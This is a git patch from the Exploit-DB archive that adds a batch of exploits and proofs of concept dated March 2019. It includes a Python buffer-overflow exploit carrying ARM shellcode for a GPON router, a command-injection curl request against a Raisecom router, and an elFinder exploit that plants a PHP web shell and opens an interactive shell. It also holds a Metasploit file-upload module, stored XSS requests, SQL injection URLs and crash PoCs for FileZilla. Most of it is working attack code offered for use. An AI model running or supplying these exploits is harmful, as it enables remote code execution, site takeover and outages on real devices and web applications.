From a37e3008e52163a63b495948c8650b446a7876d9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 5 Mar 2019 05:01:50 +0000 Subject: [PATCH] DB: 2019-03-05 20 changes to exploits/shellcodes Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1) STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) symphony CMS 2.3 - Multiple Vulnerabilities Symphony CMS 2.3 - Multiple Vulnerabilities Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution zzzphp CMS 1.6.1 - Cross-Site Request Forgery Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) OOP CMS BLOG 1.0 - Multiple SQL Injection OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery CMSsite 1.0 - Multiple Cross-Site Request Forgery elFinder 2.1.47 - Command Injection vulnerability in the PHP connector MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal Bolt CMS 3.6.4 - Cross-Site Scripting Craft CMS 3.1.12 Pro - Cross-Site Scripting WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x64 - Kill All Processes Shellcode (11 bytes) Linux/x86 - iptables -F Shellcode (43 bytes) --- exploits/hardware/dos/46469.py | 147 +++++++++ exploits/hardware/webapps/46489.txt | 19 ++ exploits/hardware/webapps/46498.txt | 41 +++ exploits/linux/dos/46484.txt | 56 ++++ exploits/php/webapps/46480.txt | 149 +++++++++ exploits/php/webapps/46481.py | 107 +++++++ exploits/php/webapps/46482.txt | 22 ++ exploits/php/webapps/46483.txt | 175 +++++++++++ exploits/php/webapps/46486.rb | 181 +++++++++++ exploits/php/webapps/46488.txt | 79 +++++ exploits/php/webapps/46495.txt | 30 ++ exploits/php/webapps/46496.txt | 31 ++ exploits/php/webapps/46497.txt | 65 ++++ exploits/windows/dos/46485.html | 184 ++++++++++++ exploits/windows/local/45496.c | 448 ++++++++++++++++++++++++++++ exploits/windows/webapps/46487.py | 150 ++++++++++ exploits/windows/webapps/46494.py | 69 +++++ files_exploits.csv | 23 +- files_shellcodes.csv | 3 + shellcodes/linux_x86-64/46492.c | 64 ++++ shellcodes/linux_x86/46491.c | 55 ++++ shellcodes/linux_x86/46493.c | 99 ++++++ 22 files changed, 2194 insertions(+), 3 deletions(-) create mode 100755 exploits/hardware/dos/46469.py create mode 100644 exploits/hardware/webapps/46489.txt create mode 100644 exploits/hardware/webapps/46498.txt create mode 100644 exploits/linux/dos/46484.txt create mode 100644 exploits/php/webapps/46480.txt create mode 100755 exploits/php/webapps/46481.py create mode 100644 exploits/php/webapps/46482.txt create mode 100644 exploits/php/webapps/46483.txt create mode 100755 exploits/php/webapps/46486.rb create mode 100644 exploits/php/webapps/46488.txt create mode 100644 exploits/php/webapps/46495.txt create mode 100644 exploits/php/webapps/46496.txt create mode 100644 exploits/php/webapps/46497.txt create mode 100644 exploits/windows/dos/46485.html create mode 100644 exploits/windows/local/45496.c create mode 100755 exploits/windows/webapps/46487.py create mode 100755 exploits/windows/webapps/46494.py create mode 100644 shellcodes/linux_x86-64/46492.c create mode 100644 shellcodes/linux_x86/46491.c create mode 100644 shellcodes/linux_x86/46493.c diff --git a/exploits/hardware/dos/46469.py b/exploits/hardware/dos/46469.py new file mode 100755 index 000000000..bdf2fa3d4 --- /dev/null +++ b/exploits/hardware/dos/46469.py @@ -0,0 +1,147 @@ +#!/usr/bin/python3 + + +import argparse +import requests +import urllib.parse +import binascii +import re + + +def run(target): + """ Execute exploitation """ + # We're using CVE-2018-10561 and/or it's extension in order to exploit this + # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this + # issue after successful authentication: "useradmin" permission is enough + # + # IP Spoofing. Perspective option here too + # + + # Step 1. Just a request to adjust stack for the exploit to work + # + # POST /GponForm/device_Form?script/ HTTP/1.1 + # Host: 192.168.1.1 + # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 + # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + # Accept-Language: en-US,en;q=0.5 + # Accept-Encoding: gzip, deflate + # Referer: http://192.168.1.1/device.html + # Content-Type: application/x-www-form-urlencoded + # Content-Length: 55 + # Connection: close + # Upgrade-Insecure-Requests: 1 + # + # XWebPageName=device&admin_action=usb_enable&usbenable=1 + + headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', + 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', + 'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded', + 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} + payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1} + try: + requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2) + except: + pass + + # Step 2. Actual Exploitation + # + # POST /GponForm/usb_Form?script/ HTTP/1.1 + # Host: 192.168.1.1 + # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 + # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + # Accept-Language: en-US,en;q=0.5 + # Accept-Encoding: gzip, deflate + # Referer: http://192.168.1.1/usb.html + # Content-Type: application/x-www-form-urlencoded + # Content-Length: 639 + # Connection: close + # Upgrade-Insecure-Requests: 1 + + # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1 + + # Weaponizing request: + + # mov r8, r8 ; NOP for ARM Thumb + + nop = "\xc0\x46" + + # .section .text + # .global _start + # + # _start: + # .code 32 + # add r3, pc, #1 + # bx r3 + # + # ; We've removed prev commands as processor is already in Thumb mode + # + # .code 16 + # add r0, pc, #8 + # eor r1, r1, r1 + # eor r2, r2, r2 + # strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime + # mov r7, #11 + # svc #1 + # .ascii "/bin/tftpdX" + + shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58" + + # Overwritting only 3 bytes in order to get \x00 in 4th + + pc = "\xe1\x8c\x03" + + exploit = "A" + 197 * nop + shellcode + 26*"A" + pc + + payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', + 'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', + 'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'} + headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', + 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', + 'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded', + 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', + 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} + # Prevent requests from URL encoding + payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items()) + try: + requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2) + except: + pass + + print("The payload has been sent. Please check UDP 69 port of router for the tftpd service"); + print("You can use something like: sudo nmap -sU -p 69 192.168.1.1"); + + +def main(): + """ Parse command line arguments and start exploit """ + + # + # Exploit should be executed after reboot. You can easily achive this in 3 ways: + # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that + # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page + # 3) Repeat this exploit at least twice ;) + # any of those will work! + # + + parser = argparse.ArgumentParser( + add_help=False, + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog="Examples: %(prog)s -t http://192.168.1.1/") + + # Adds arguments to help menu + parser.add_argument("-h", action="help", help="Print this help message then exit") + parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/") + + # Assigns the arguments to various variables + args = parser.parse_args() + + run(args.target) + + +# +# Main +# + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/46489.txt b/exploits/hardware/webapps/46489.txt new file mode 100644 index 000000000..6ed814092 --- /dev/null +++ b/exploits/hardware/webapps/46489.txt @@ -0,0 +1,19 @@ +# Exploit Title: Remote code execution in Raisecom xpon +# Date: 03/03/2019 +# Exploit Author: JameelNabbo +# Website: Ordina.nl +# Vendor Homepage: https://www.raisecom.com +# Software Link: https://www.raisecom.com/products/xpon +# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 +# Tested on: MacOSX +# CVE-2019-7385 + +POC: +curl -i -s -k -X 'POST' \ +-H 'Origin: http://127.0.0.1' -H -H 'Content-Type: +application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \ +--data-binary +$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' +\ +'http://192.168.1.1/boaform/formPasswordSetup' \ No newline at end of file diff --git a/exploits/hardware/webapps/46498.txt b/exploits/hardware/webapps/46498.txt new file mode 100644 index 000000000..24f6903a0 --- /dev/null +++ b/exploits/hardware/webapps/46498.txt @@ -0,0 +1,41 @@ +# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting +# Date: 04.03.2019 +# Exploit Author: Tauco +# Vendor Homepage: http://www.fiberhomegroup.com/en/ +# Version: RP2669 +# Tested on: Windows 10 +# CVE : CVE-2019-9556 + +Description: +=========================================================================== + +Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. + +https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002) + +Proof of concept : + +=========================================================================== +1. Login with credential 192.168.1.1 +2. Go to Management +3. Open User Account +4. Add user +5. Inject the post parameter "account_user" +6. Encode Url + +POST /goform/setUser HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 101 +Cache-Control: max-age=0 +Origin: http://192.168.1.1 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://192.168.1.1/management/account_admin.asp +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: loginName=admin +Connection: close + +account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new \ No newline at end of file diff --git a/exploits/linux/dos/46484.txt b/exploits/linux/dos/46484.txt new file mode 100644 index 000000000..cd81db432 --- /dev/null +++ b/exploits/linux/dos/46484.txt @@ -0,0 +1,56 @@ +# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: February 20, 2019 +# Vendor Homepage: https://filezilla-project.org +# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 +# Tested Version: 3.40.0 +# Tested on: Kali linux x86_64 +# Vulnerability Type: Denial of Service (DoS) + + +# Steps to Produce the Crash: +# 1.- Run python code : python filezilla.py +# 2.- Open buff.txt and copy content to clipboard +# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively) +# 4.- In the opend window, Set Search type to "Local search" +# 5.- Paste ClipBoard on "Search directory" and click on "Search" +# 6.- Boom! Crashed... + + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = "/" + buffer + "BBBB" + "CCCC" +f = open("buff.txt", "w") +f.write(crash) +f.close() + +# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. + + +# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://filezilla-project.org +# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1 +# Tested Version: 3.40.0 +# Tested on: Kali linux x86_64 +# Vulnerability Type: Denial of Service (DoS) + + +# Steps to Produce the Crash: +# 1.- Run python code : python filezilla-2.py +# 2.- Open crash.txt and copy content to clipboard +# 3.- In "Local site" section paste clipboard and Enter. +# 4.- Boom! Crashed... + + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = "/" + buffer + "BBBB" + "CCCC" +f = open("crash.txt", "w") +f.write(crash) +f.close() + +# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path. \ No newline at end of file diff --git a/exploits/php/webapps/46480.txt b/exploits/php/webapps/46480.txt new file mode 100644 index 000000000..299d1e8da --- /dev/null +++ b/exploits/php/webapps/46480.txt @@ -0,0 +1,149 @@ +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + + Delete Admin + + +
+ +
+ + + + +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + + Edit Admin + + +
+ + + +
+ + +

+ +
+ + +

+ +
+ + +

+ +
+ + +

+
+ + +

+ +
+ + +

+ +
+ + +

+
+ + + +
+ + + + +# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Add Admin + + +
+ +
+ +

+
+ +
+ +

+
+ +
+ +

+
+ +
+ +

+
+
+

+
+
+ +

+ +
+
+ +

+
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46481.py b/exploits/php/webapps/46481.py new file mode 100755 index 000000000..b351848ea --- /dev/null +++ b/exploits/php/webapps/46481.py @@ -0,0 +1,107 @@ +#!/usr/bin/python + +''' +# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector. +# Date: 26/02/2019 +# Exploit Author: @q3rv0 +# Vulnerability reported by: Thomas Chauchefoin +# Google Dork: intitle:"elFinder 2.1.x" +# Vendor Homepage: https://studio-42.github.io/elFinder/ +# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz +# Version: <= 2.1.47 +# Tested on: Linux 64bit + Python2.7 +# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/ +# CVE: CVE-2019-9194 + +# Usage: python exploit.py [URL] + +''' + +import requests + +import json + +import sys + + +payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg' + + +def usage(): + + if len(sys.argv) != 2: + + print "Usage: python exploit.py [URL]" + + sys.exit(0) + + +def upload(url, payload): + + files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))} + + data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"} + + r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data) + + j = json.loads(r.text) + + return j['added'][0]['hash'] + + +def imgRotate(url, hash): + + r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash)) + + return r.text + + +def shell(url): + + r = requests.get("%s/php/SecSignal.php" % url) + + if r.status_code == 200: + + print "[+] Pwned! :)" + + print "[+] Getting the shell..." + + while 1: + + try: + + input = raw_input("$ ") + + r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input)) + + print r.text + + except KeyboardInterrupt: + + sys.exit("\nBye kaker!") + + else: + + print "[*] The site seems not to be vulnerable :(" + + +def main(): + + usage() + + url = sys.argv[1] + + print "[*] Uploading the malicious image..." + + hash = upload(url, payload) + + print "[*] Running the payload..." + + imgRotate(url, hash) + + shell(url) + + +if __name__ == "__main__": + + main() \ No newline at end of file diff --git a/exploits/php/webapps/46482.txt b/exploits/php/webapps/46482.txt new file mode 100644 index 000000000..59368d0f9 --- /dev/null +++ b/exploits/php/webapps/46482.txt @@ -0,0 +1,22 @@ +# Exploit Title: OOP CMS BLOG 1.0 - SQL Injection +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# Multiple files are vulnerable: + +# http://localhost/[PATH]/search.php?search=1 [SQLi]&submit=Search +# http://localhost/[PATH]/post.php?id=17 [SQLi] +# http://localhost/[PATH]/posts.php?id=4 [SQLi] +# http://localhost/[PATH]/page.php?pageid=8 [SQLi] +# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi] +# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi] + +# Note: Above *id values are random. \ No newline at end of file diff --git a/exploits/php/webapps/46483.txt b/exploits/php/webapps/46483.txt new file mode 100644 index 000000000..cfe8dd13d --- /dev/null +++ b/exploits/php/webapps/46483.txt @@ -0,0 +1,175 @@ +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + +
+ +
+ + + + +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Update Site Title and Description) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Post) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: March 1, 2019 +# Vendor Homepage: http://zsoft.com.bd/ +# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip +# Tested Version: 1.0 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + + + + +
+ + + +
+ + + +
+ + + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + + +
+ + +
+ + + + +# Note: Many other sections are vulnerable to CSRF, too. +# For example: Delete Post, Add Slider, ... \ No newline at end of file diff --git a/exploits/php/webapps/46486.rb b/exploits/php/webapps/46486.rb new file mode 100755 index 000000000..a267f601b --- /dev/null +++ b/exploits/php/webapps/46486.rb @@ -0,0 +1,181 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution', + 'Description' => %q{ + This module exploits a file upload vulnerability Booked 2.7.5. + In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files. + Upload sections has file extension control except favicon part. + You can upload the file with the extension you want through the Favicon field. + The file you upload is written to the main directory of the site under the name "custom-favicon". + After upload the php payload to the main directory, Exploit executes payload and receives shell. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Booked Scheduler v2.7.5', {}] + ], + 'DisclosureDate' => '01 March 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptBool.new('SSL', [true, 'Use SSL', false]), + OptString.new('TARGETURI', [true, 'The base path to Booked', '/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', 'admin']), + ], self.class) + end +## +# Check Exploit Vulnerable +## + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/Web/index.php") + }) + + if res and res.code == 200 and res.body =~ /v2.7.5/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + return res + end +## +# Exploit Portion +## + def exploit + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/Web/index.php"), + 'vars_post' => { + "email" => datastore['USER'], + "password" => datastore['PASS'], + "captcha" => "", + "resume" => "", + "language" => "en_us", + "login" => "submit" + + } + }) + + if res and res.code == 302 + print_status("Successful redirection to admin dashboard.") + else + return res + end + + get_cookie = res.get_cookies + cookie = get_cookie +## +# Login Access Control +## + control = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/Web/dashboard.php") + }) + + html = control.body + if html =~ /Dashboard/ + print_good("Login successfuly") + else + print_status("User information is incorrect. Login failed") + exit 0 + end +## +# Reading CSRF Token +## + csrf = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php") + }) + + html = control.body + if html =~ /Look and Feel/ + token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] + print_status("CSRF Token = #{token}") + else + print_status("User information is incorrect. Login failed") + exit 0 + end +## +# Loading phase of the vulnerable file +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data2 = "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n" + data2 << "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\"" + data2 << "\r\nContent-Type: text/html\r\n\r\n" + data2 << payload.encoded + data2 << "\n\r\n-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n" + data2 << "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n" + data2 << "#{token}" + data2 << "\r\n-----------------------------{boundary}--\r\n" + + res = send_request_raw( + { + 'method' => "POST", + 'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"), + 'data' => data2, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}', + }, + 'cookie' => cookie + }) + + if res and res.code == 200 + print_good "Payload was successfully uploaded." + else + print_error "Upload failed." + return + end +## +# Command execution and shell retrieval +## + print_status("Attempting to execute the payload...") + + command = payload.encoded + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"), + 'cookie' => cookie + }, 25) + + + if res and res.code == 200 + print_good "Payload executed successfully" + end + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/php/webapps/46488.txt b/exploits/php/webapps/46488.txt new file mode 100644 index 000000000..acd759b3c --- /dev/null +++ b/exploits/php/webapps/46488.txt @@ -0,0 +1,79 @@ +# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1 +# Google Dork: intext:"2015-2019 zzcms.com" + +# Date: 26/02/2019 + +# Exploit Author: Yang Chenglong + +# Vendor Homepage: http://www.zzzcms.com/index.html + +# Software Link: http://115.29.55.18/zzzphp.zip + +# Version: 1.6.1 + +# Tested on: windows/Linux,iis/apache + +# CVE : CVE-2019-9082 + +Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation. + +Exploit: + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + +Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation. + +Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454 \ No newline at end of file diff --git a/exploits/php/webapps/46495.txt b/exploits/php/webapps/46495.txt new file mode 100644 index 000000000..310340d83 --- /dev/null +++ b/exploits/php/webapps/46495.txt @@ -0,0 +1,30 @@ +# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting +# Date: 2019-03-04 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://bolt.cm/ +# Software Link : https://github.com/bolt/bolt +# Software : Bolt CMS - v 3.6.4 +# Version : v 3.6.4 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2019-9553 + +# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4. + +# HTTP POST Request : + +POST /bolt/editcontent/pages HTTP/1.1 +Host: bolt-up3x24.bolt.dockerfly.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages +Content-Type: application/x-www-form-urlencoded +Content-Length: 562 +DNT: 1 +Connection: close +Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb +Upgrade-Insecure-Requests: 1 + 